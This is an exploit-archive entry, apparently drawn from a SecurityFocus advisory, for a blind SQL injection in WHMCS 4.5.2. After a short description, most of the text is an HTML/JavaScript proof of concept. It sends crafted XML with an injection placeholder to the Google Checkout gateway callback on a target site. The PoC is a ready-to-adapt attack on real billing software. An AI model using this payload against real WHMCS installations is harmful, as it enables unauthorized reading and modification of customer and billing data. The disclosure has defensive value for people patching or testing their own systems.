36 lines
No EOL
1.3 KiB
HTML
36 lines
No EOL
1.3 KiB
HTML
source: http://www.securityfocus.com/bid/56173/info
|
|
|
|
WHMCS (WHM Complete Solution) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
WHMCS 4.5.2 is vulnerable; other versions may also be affected.
|
|
|
|
#Proof of Concept :
|
|
|
|
<html>
|
|
<head>
|
|
<title>WHMCS Blind SQL Injection POC</title>
|
|
</head>
|
|
<body>
|
|
<script>
|
|
var params = "<charge-amount-notification><google-order-number>0' %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>";
|
|
var http = new XMLHttpRequest();
|
|
try {
|
|
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
|
|
} catch (e) {
|
|
alert("Permission UniversalBrowserRead denied.");
|
|
}
|
|
http.open("POST", "http://site.com/whmcs/modules/gateways/callback/googlecheckout.php", true);
|
|
http.onreadystatechange = handleResponse;
|
|
http.send(params);
|
|
function handleResponse() {
|
|
|
|
if(http.readyState == 4 && http.status == 200){
|
|
var response = http.responseText;
|
|
alert(response);
|
|
}
|
|
}
|
|
</script>
|
|
</body>
|
|
</html> |